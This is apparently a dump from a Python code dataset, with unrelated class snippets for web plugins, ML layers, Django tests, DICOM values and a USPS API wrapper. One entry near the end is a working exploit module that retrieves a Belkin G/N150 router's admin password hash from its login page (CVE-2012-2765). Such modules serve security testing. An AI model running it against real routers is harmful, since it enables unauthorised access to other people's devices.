        self.add_url_rule('/select', view_func=self.select, methods=['POST'])

    def get_icon(self):
        """Icon shown in the lyrebird UI."""
        return 'fa fa-fw fa-line-chart'

    def default_conf(self):
        """Load the bundled default configuration file."""
        conf_path = os.path.dirname(__file__) + '/conf.json'
        with codecs.open(conf_path, 'r', 'utf-8') as f:
            return json.load(f)
class LockedDropout(nn.Module):
    """Locked dropout layer.

    Input is a 3D tensor; the dropout mask is sampled once per forward
    call and is constant along dimension 0.
    """

    def __init__(self, drop):
        super().__init__()
        self.drop = nn.Dropout(drop)

    def forward(self, x):
        # Mask of shape (1, T, C) broadcasts over dimension 0.
        mask = self.drop(torch.ones(1, x.size(1), x.size(2)).cuda())
        return x * mask
class FBNamespaceAction(object):
    """Namespace flags."""

    # Generated attribute stubs: each is a property carrying only its
    # documentation string.
    kFBConcatNamespace = property(doc="Use to add a namespace name to object. ")
    kFBReplaceNamespace = property(doc="Use to replace a define namespace. ")
    kFBRemoveAllNamespace = property(doc="Remove all the namespace name. ")
| 62598fac23849d37ff85105d |
@override_settings(ALLOWED_HOSTS=['rdap.example'])
class TestNameserverToDict(SimpleTestCase):
    """Test `rdap.rdap_rest.domain.nameserver_to_dict` function."""

    def setUp(self):
        self.request = RequestFactory(HTTP_HOST='rdap.example').get('/dummy/')

    def test_simple(self):
        """A bare nameserver yields a self-link built from the host."""
        nameserver = NameServer(fqdn='nameserver.example.cz', ip_addresses=[])
        result = nameserver_to_dict(self.request, nameserver)
        self.assertEqual(
            result['links'][0]['value'],
            'http://rdap.example/nameserver/nameserver.example.cz')
class ConversationMessageFactory(DjangoModelFactory):
    """Factory for message creation."""

    class Meta:
        model = ConversationMessageModel
        strategy = CREATE_STRATEGY

    body = Faker('text')
    # NOTE(review): now() is evaluated once at import time, so every
    # instance shares the same timestamp — confirm this is intended.
    sent_at = now()
class Tv(Video):
    """Child class inherited from the Video parent class, adding a
    broadcaster attribute."""

    def __init__(self, title, box_art, poster_image_url,
                 trailer_youtube_url, broadcaster):
        Video.__init__(self, title, box_art, poster_image_url,
                       trailer_youtube_url)
        self.broadcaster = broadcaster

    def show_trailer(self):
        """Open the trailer URL in the default web browser."""
        webbrowser.open(self.trailer_youtube_url)
class ForkChildVortex(object):
    """VortexServer — the static instance of the controller.

    Child-process stand-in for a vortex: only sending is supported;
    every other operation raises NotImplementedError.
    """

    def __init__(self, vortexClientProtocol):
        assert isinstance(vortexClientProtocol, VortexPayloadProtocol)
        self._vortexClientProtocol = vortexClientProtocol

    def uuid(self):
        return self._vortexClientProtocol.serverVortexUuid

    def isShutdown(self):
        raise NotImplementedError

    def shutdown(self):
        raise NotImplementedError

    def vortexUuids(self):
        raise NotImplementedError

    def isVortexAlive(self, vortexUuid):
        raise NotImplementedError

    def vortexClientIpPort(self, vortexUuid):
        raise NotImplementedError

    def _beat(self):
        raise NotImplementedError

    def connectionOpened(self, session, vortexConnection):
        raise NotImplementedError

    def connectionClosed(self, conn):
        raise NotImplementedError

    def _sessionExpired(self, sessionUuid):
        raise NotImplementedError

    def payloadReveived(self, session, conn, payload):
        # NOTE: method name typo ("Reveived") kept for caller compatibility.
        raise NotImplementedError

    def send(self, payload, vortexUuid=None):
        """Serialise the payload uncompressed and hand it to sendVortexMsg."""
        self.sendVortexMsg(vortexMsg=payload.toVortexMsg(compressionLevel=0),
                           vortexUuid=vortexUuid)

    def sendVortexMsg(self, vortexMsg, vortexUuid=None):
        """Write the message to the shared stdio stream; a '.' is written
        after each message — presumably a delimiter, confirm with reader."""
        ModData.standardIo.write(vortexMsg)
        ModData.standardIo.write('.')
class TestNormalizedAction(unittest.TestCase):
    """NormalizedAction unit test stubs."""

    def setUp(self):
        pass

    def tearDown(self):
        pass

    def testNormalizedAction(self):
        # Construction smoke test only.
        model = artikcloud.models.normalized_action.NormalizedAction()
class MdiChild(pmonitor.Monitor):
    """Create an instance of pmonitor.Monitor for use as an MDI child."""

    def __init__(self, fio, cmds, info, title='X', mmax=100):
        super(MdiChild, self).__init__(fio, cmds, info, title, mmax)
class MagnitudeSigmaIMTTrellis(MagnitudeIMTTrellis):
    """Creates the Trellis plot for the standard deviations."""

    def _build_plot(self, ax, i_m, gmvs):
        """Plot each GMPE's sigma-vs-magnitude curve on ``ax``."""
        self.labels = []
        self.lines = []
        for gmpe in self.gsims:
            gmpe_name = gmpe.__class__.__name__
            self.labels.append(gmpe_name)
            line, = ax.plot(self.magnitudes,
                            gmvs[gmpe_name][i_m][:, 0],
                            '-', linewidth=2.0, label=gmpe_name)
            self.lines.append(line)
            # Axis styling runs once per GMPE, mirroring the original code.
            ax.grid(True)
            ax.set_xlim(floor(self.magnitudes[0]), ceil(self.magnitudes[-1]))
            self._set_labels(i_m, ax)

    def get_ground_motion_values(self):
        """Return {gmpe name: {imt: sigma array of shape (n_rup, n_sites)}}."""
        gmvs = OrderedDict()
        for gmpe in self.gsims:
            gmpe_name = gmpe.__class__.__name__
            gmvs[gmpe_name] = {}
            for i_m in self.imts:
                sigma_values = np.zeros([len(self.rctx), self.nsites],
                                        dtype=float)
                for iloc, rct in enumerate(self.rctx):
                    _, sigmas = gmpe.get_mean_and_stddevs(
                        self.sctx, rct, self.dctx,
                        imt.from_string(i_m), [self.stddevs])
                    sigma_values[iloc, :] = sigmas[0]
                gmvs[gmpe_name][i_m] = sigma_values
        return gmvs

    def _set_labels(self, i_m, ax):
        """Label axes with magnitude and the standard-deviation type."""
        ax.set_xlabel("Magnitude", fontsize=16)
        ax.set_ylabel(self.stddevs + " Std. Dev.", fontsize=16)
class LoginHelper(object): <NEW_LINE> <INDENT> def do_login(self, data): <NEW_LINE> <INDENT> return self.client.post( f"{reverse('login')}?next=/openid/authorize/" f"%3Fresponse_type%3Dcode%26scope%3Dopenid%26client_id" f"%3Dmigration_client_id%26redirect_uri%3Dhttp%3A%2F%2F" f"example.com%2F%26state%3D3G3Rhw9O5n0okXjZ6mEd2paFgHPxOvoO", data=data, follow=True ) | Test urls can be handled a bit better, however this was the fastest way
to refactor the existing tests. | 62598fac1b99ca400228f504 |
class prop_writer (object): <NEW_LINE> <INDENT> def __init__ (self, filepath, transform, scene): <NEW_LINE> <INDENT> self.lib = dsf.path_util.daz_library (filepath = filepath) <NEW_LINE> self.scene = scene <NEW_LINE> self.duf_libpath = self.lib.get_libpath (filepath) <NEW_LINE> self.transform = transform <NEW_LINE> <DEDENT> @classmethod <NEW_LINE> def get_selected_objects (self, scene): <NEW_LINE> <INDENT> objects = [obj for obj in scene.objects if obj.select] <NEW_LINE> return objects <NEW_LINE> <DEDENT> @classmethod <NEW_LINE> def get_selected_objects_by_data (self, scene): <NEW_LINE> <INDENT> all_objs = self.get_selected_objects (scene) <NEW_LINE> groups = dsf.geom_create.group_objects_by_mesh (all_objs) <NEW_LINE> objs = [obj[0] for obj in groups] <NEW_LINE> return objs <NEW_LINE> <DEDENT> def create_data_file (self, ctx): <NEW_LINE> <INDENT> objects = self.get_selected_objects_by_data (ctx.scene) <NEW_LINE> gcreator = dsf.geom_create.geom_creator (ctx.scene, self.transform) <NEW_LINE> geometry_datas = [gcreator.create_geometry_and_uvs (obj) for obj in objects] <NEW_LINE> for gdata in geometry_datas: <NEW_LINE> <INDENT> geo = gdata.geometry <NEW_LINE> uvs = gdata.uvs <NEW_LINE> if uvs: <NEW_LINE> <INDENT> geo['default_uv_set'] = '#' + urp.quote (uvs[0]['id']) <NEW_LINE> <DEDENT> <DEDENT> data = { "asset_info": {}, "geometry_library": [g.geometry for g in geometry_datas], "uv_set_library": sum ([g.uvs for g in geometry_datas], []) } <NEW_LINE> return data <NEW_LINE> <DEDENT> def write_json (self, libpath, data): <NEW_LINE> <INDENT> ofh = self.lib.create_output_stream (libpath) <NEW_LINE> json.dump (data, ofh, indent = 2, sort_keys = True) <NEW_LINE> <DEDENT> def write_geometries (self, objs): <NEW_LINE> <INDENT> geom_writer = dsf.geom_writer.geom_writer (self.lib, self.scene, self.transform) <NEW_LINE> data_dic = geom_writer.write_meshes_for_objects (objs) <NEW_LINE> return data_dic <NEW_LINE> <DEDENT> def write_objects (self, objs, data_dic): <NEW_LINE> 
<INDENT> scene_writer = dsf.scene_writer.scene_writer (self.transform, data_dic) <NEW_LINE> data = scene_writer.create_scene_file (objs) <NEW_LINE> self.lib.write_local_file (data, self.duf_libpath) <NEW_LINE> <DEDENT> def write_scene (self, ctx): <NEW_LINE> <INDENT> scene = ctx.scene <NEW_LINE> objs = self.get_selected_objects (self.scene) <NEW_LINE> data_dic = self.write_geometries (objs) <NEW_LINE> self.write_objects (objs, data_dic) | write props for a single export-operation.
| 62598fac7d847024c075c36d |
class DSfloat(float): <NEW_LINE> <INDENT> __slots__ = 'original_string' <NEW_LINE> def __init__(self, val): <NEW_LINE> <INDENT> if isinstance(val, (str, compat.text_type)): <NEW_LINE> <INDENT> self.original_string = val <NEW_LINE> <DEDENT> elif isinstance(val, (DSfloat, DSdecimal)) and hasattr(val, 'original_string'): <NEW_LINE> <INDENT> self.original_string = val.original_string <NEW_LINE> <DEDENT> <DEDENT> def __str__(self): <NEW_LINE> <INDENT> if hasattr(self, 'original_string'): <NEW_LINE> <INDENT> return self.original_string <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> return super(DSfloat, self).__str__() <NEW_LINE> <DEDENT> <DEDENT> def __repr__(self): <NEW_LINE> <INDENT> return "'" + str(self) + "'" | Store values for DICOM VR of DS (Decimal String) as a float.
If constructed from an empty string, return the empty string,
not an instance of this class. | 62598fac10dbd63aa1c70b5c |
class Model(peewee.Model): <NEW_LINE> <INDENT> uid = peewee.PrimaryKeyField(unique=True, index=True) <NEW_LINE> uts = peewee.DateTimeField(default=datetime.datetime.now, index=True) <NEW_LINE> class Meta: <NEW_LINE> <INDENT> database = db.pool <NEW_LINE> order_by = ('-uts', ) | Common db model:
uid - primary key
uts - timestamp (auto on creation) | 62598fac85dfad0860cbfa48 |
class NetworkNamespace(object): <NEW_LINE> <INDENT> CLONE_NEWNET = 0x40000000 <NEW_LINE> @staticmethod <NEW_LINE> def _error_handler(result, func, arguments): <NEW_LINE> <INDENT> if result == -1: <NEW_LINE> <INDENT> errno = ctypes.get_errno() <NEW_LINE> raise OSError(errno, os.strerror(errno)) <NEW_LINE> <DEDENT> <DEDENT> def __init__(self, netns): <NEW_LINE> <INDENT> self.current_netns = '/proc/{pid}/ns/net'.format(pid=os.getpid()) <NEW_LINE> self.target_netns = '/var/run/netns/{netns}'.format(netns=netns) <NEW_LINE> self.set_netns = ctypes.CDLL('libc.so.6', use_errno=True).setns <NEW_LINE> self.set_netns.errcheck = self._error_handler <NEW_LINE> <DEDENT> def __enter__(self): <NEW_LINE> <INDENT> self.current_netns_fd = open(self.current_netns, encoding='utf-8') <NEW_LINE> with open(self.target_netns, encoding='utf-8') as fd: <NEW_LINE> <INDENT> self.set_netns(fd.fileno(), self.CLONE_NEWNET) <NEW_LINE> <DEDENT> <DEDENT> def __exit__(self, *args): <NEW_LINE> <INDENT> self.set_netns(self.current_netns_fd.fileno(), self.CLONE_NEWNET) <NEW_LINE> self.current_netns_fd.close() | A network namespace context manager.
Runs wrapped code inside the specified network namespace.
:param netns: The network namespace name to enter. | 62598fac63d6d428bbee2754 |
class PyTest(TestCommand): <NEW_LINE> <INDENT> def finalize_options(self): <NEW_LINE> <INDENT> TestCommand.finalize_options(self) <NEW_LINE> self.test_args = ['-s'] <NEW_LINE> self.test_suite = True <NEW_LINE> <DEDENT> def run_tests(self): <NEW_LINE> <INDENT> import pytest <NEW_LINE> errcode = pytest.main(self.test_args) <NEW_LINE> sys.exit(errcode) | pytest's integration with setuptools, which is borrowed from
http://pytest.org/latest/goodpractises.html#goodpractises | 62598facd7e4931a7ef3c03f |
class PotentialKey(DefaultModel): <NEW_LINE> <INDENT> id: str = Field( ..., description="A unique identifier of this potential, i.e. a SMARTS pattern or an atom type", ) <NEW_LINE> mult: Optional[int] = Field( None, description="The index of this duplicate interaction" ) <NEW_LINE> associated_handler: Optional[str] = Field( None, description="The type of handler this potential key is associated with, " "i.e. 'Bonds', 'vdW', or 'LibraryCharges", ) <NEW_LINE> bond_order: Optional[float] = Field( None, description="If this is a key to a WrappedPotential interpolating multiple parameter(s), " "the bond order determining the coefficients of the wrapped potentials.", ) <NEW_LINE> def __hash__(self) -> int: <NEW_LINE> <INDENT> return hash((self.id, self.mult, self.associated_handler, self.bond_order)) | A unique identifier of an instance of physical parameters as applied to a segment of a chemical topology.
These refer to a single term in a force field as applied to a single segment of a chemical
topology, i.e. a single atom or dihedral. For example, a PotentialKey corresponding to a
bond would store the the force constant and the equilibrium bond length as determined by
the force field. These keys to not have direct knowledge of where in a topology they have been
applied.
Examples
--------
Create a PotentialKey corresponding to the parameter with id `b55` in OpenFF "Parsley" 1.0.0
.. code-block:: pycon
>>> from openff.interchange.models import PotentialKey
>>> from openff.toolkit.typing.engines.smirnoff import ForceField
>>> parsley = ForceField("openff-1.0.0.offxml")
>>> param = parsley["Bonds"].get_parameter({"id": "b55"})[0]
>>> bond_55 = PotentialKey(id=param.smirks)
>>> bond_55
PotentialKey(id='[#16X4,#16X3:1]-[#8X2:2]', mult=None, associated_handler=None, bond_order=None)
Create a PotentialKey corresponding to the angle parameters in OPLS-AA defined
between atom types opls_135, opls_135, and opls_140
.. code-block:: pycon
>>> oplsaa_angle = PotentialKey(id="opls_135-opls_135-opls_140")
>>> oplsaa_angle
PotentialKey(id='opls_135-opls_135-opls_140', mult=None, associated_handler=None, bond_order=None) | 62598faca219f33f346c67c0 |
class USPSService(object): <NEW_LINE> <INDENT> SERVICE_NAME = '' <NEW_LINE> CHILD_XML_NAME = '' <NEW_LINE> PARAMETERS = [] <NEW_LINE> @property <NEW_LINE> def API(self): <NEW_LINE> <INDENT> return self.SERVICE_NAME <NEW_LINE> <DEDENT> def __init__(self, url, user_id): <NEW_LINE> <INDENT> self.url = url <NEW_LINE> self.user_id = user_id <NEW_LINE> <DEDENT> def submit_xml(self, xml): <NEW_LINE> <INDENT> data = {'XML':ET.tostring(xml), 'API':self.API} <NEW_LINE> response = urllib.request.urlopen(self.url, bytes(urllib.parse.urlencode(data), "utf-8")) <NEW_LINE> root = ET.parse(response).getroot() <NEW_LINE> if root.tag == 'Error': <NEW_LINE> <INDENT> raise USPSXMLError(root) <NEW_LINE> <DEDENT> error = root.find('.//Error') <NEW_LINE> if error: <NEW_LINE> <INDENT> raise USPSXMLError(error) <NEW_LINE> <DEDENT> return root <NEW_LINE> <DEDENT> def parse_xml(self, xml): <NEW_LINE> <INDENT> items = list() <NEW_LINE> for item in xml.getchildren(): <NEW_LINE> <INDENT> items.append(xmltodict(item)) <NEW_LINE> <DEDENT> return items <NEW_LINE> <DEDENT> def make_xml(self, data, user_id): <NEW_LINE> <INDENT> root = ET.Element(self.SERVICE_NAME+'Request') <NEW_LINE> root.attrib['USERID'] = user_id <NEW_LINE> index = 0 <NEW_LINE> for data_dict in data: <NEW_LINE> <INDENT> data_xml = dicttoxml(data_dict, self.CHILD_XML_NAME, self.PARAMETERS) <NEW_LINE> data_xml.attrib['ID'] = str(index) <NEW_LINE> root.append(data_xml) <NEW_LINE> index += 1 <NEW_LINE> <DEDENT> return root <NEW_LINE> <DEDENT> def execute(self,data, user_id=None): <NEW_LINE> <INDENT> if user_id is None: <NEW_LINE> <INDENT> user_id = self.user_id <NEW_LINE> <DEDENT> xml = self.make_xml(data, user_id) <NEW_LINE> logger.info("USPS XML Request: %s" % ET.tostring(xml)) <NEW_LINE> return self.parse_xml(self.submit_xml(xml)) | Base USPS Service Wrapper implementation | 62598fac6e29344779b00606 |
class ISPClass: <NEW_LINE> <INDENT> yidong = [139, 138, 137, 136, 135, 134, 159, 158, 157, 150, 151, 152, 147, 188, 187, 182, 183, 184, 178] <NEW_LINE> liantong = [130, 131, 132, 156, 155, 186, 185, 145, 176] <NEW_LINE> dianxin = [133, 153, 189, 180, 181, 177, 173] <NEW_LINE> simulate = [100, 199] <NEW_LINE> all = yidong + liantong + dianxin | 号段数据 | 62598fac99cbb53fe6830e81 |
class Exploit(exploits.Exploit): <NEW_LINE> <INDENT> __info__ = { 'name': 'Belkin G & N150 Password Disclosure', 'description': 'Module exploits Belkin G and N150 Password MD5 Disclosure vulnerability which allows fetching administration\'s password in md5 format', 'authors': [ 'Aodrulez <f3arm3d3ar[at]gmail.com>', 'Avinash Tangirala', 'Marcin Bury <marcin.bury[at]reverse-shell.com>', ], 'references': [ 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2765', 'https://www.exploit-db.com/exploits/17349/', ], 'devices': [ 'Belkin G', 'Belkin N150', ], } <NEW_LINE> target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) <NEW_LINE> port = exploits.Option(80, 'Target Port') <NEW_LINE> def run(self): <NEW_LINE> <INDENT> url = "{}:{}/login.stm".format(self.target, self.port) <NEW_LINE> response = http_request(method="GET", url=url) <NEW_LINE> if response is None: <NEW_LINE> <INDENT> return <NEW_LINE> <DEDENT> val = re.findall('password\s?=\s?"(.+?)"', response.text) <NEW_LINE> if len(val): <NEW_LINE> <INDENT> print_success("Exploit success") <NEW_LINE> data = [('admin', val[0])] <NEW_LINE> headers = ("Login", "MD5 Password") <NEW_LINE> print_table(headers, *data) <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> print_error("Exploit failed. Device seems to be not vulnerable.") <NEW_LINE> <DEDENT> <DEDENT> @mute <NEW_LINE> def check(self): <NEW_LINE> <INDENT> url = "{}:{}/login.stm".format(self.target, self.port) <NEW_LINE> response = http_request(method="GET", url=url) <NEW_LINE> if response is None: <NEW_LINE> <INDENT> return False <NEW_LINE> <DEDENT> val = re.findall('password\s?=\s?"(.+?)"', response.text) <NEW_LINE> if len(val): <NEW_LINE> <INDENT> return True <NEW_LINE> <DEDENT> return False | Exploit implementation for Belkin G and N150 Password MD5 Disclosure vulnerability.
If the target is vulnerable, password in MD5 format is returned. | 62598fac66673b3332c30375 |
class ConfigurationMixin(object): <NEW_LINE> <INDENT> def _render_config(self, flavor): <NEW_LINE> <INDENT> config = template.SingleInstanceConfigTemplate( self.datastore_version, flavor, self.id) <NEW_LINE> config.render() <NEW_LINE> return config <NEW_LINE> <DEDENT> def _render_replica_source_config(self, flavor): <NEW_LINE> <INDENT> config = template.ReplicaSourceConfigTemplate( self.datastore_version, flavor, self.id) <NEW_LINE> config.render() <NEW_LINE> return config <NEW_LINE> <DEDENT> def _render_replica_config(self, flavor): <NEW_LINE> <INDENT> config = template.ReplicaConfigTemplate( self.datastore_version, flavor, self.id) <NEW_LINE> config.render() <NEW_LINE> return config <NEW_LINE> <DEDENT> def _render_config_dict(self, flavor): <NEW_LINE> <INDENT> config = template.SingleInstanceConfigTemplate( self.datastore_version, flavor, self.id) <NEW_LINE> ret = config.render_dict() <NEW_LINE> LOG.debug("the default template dict of mysqld section: %s", ret) <NEW_LINE> return ret | Configuration Mixin
Configuration related tasks for instances and resizes. | 62598fac1f5feb6acb162bca |
class SpiralMovement(Movement): <NEW_LINE> <INDENT> def position(self, data, robot): <NEW_LINE> <INDENT> x, y, alpha, v, v_alpha = data <NEW_LINE> if v < 20: <NEW_LINE> <INDENT> a = 1 <NEW_LINE> a_alpha = 1 <NEW_LINE> return a, a_alpha <NEW_LINE> <DEDENT> else: <NEW_LINE> <INDENT> a = 1 <NEW_LINE> a_alpha = 0 <NEW_LINE> <DEDENT> return a, a_alpha | Accelerates to a certain speed while turning,
then keeps accelerating while retaining turn speed. | 62598fac4e4d5625663723cf |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.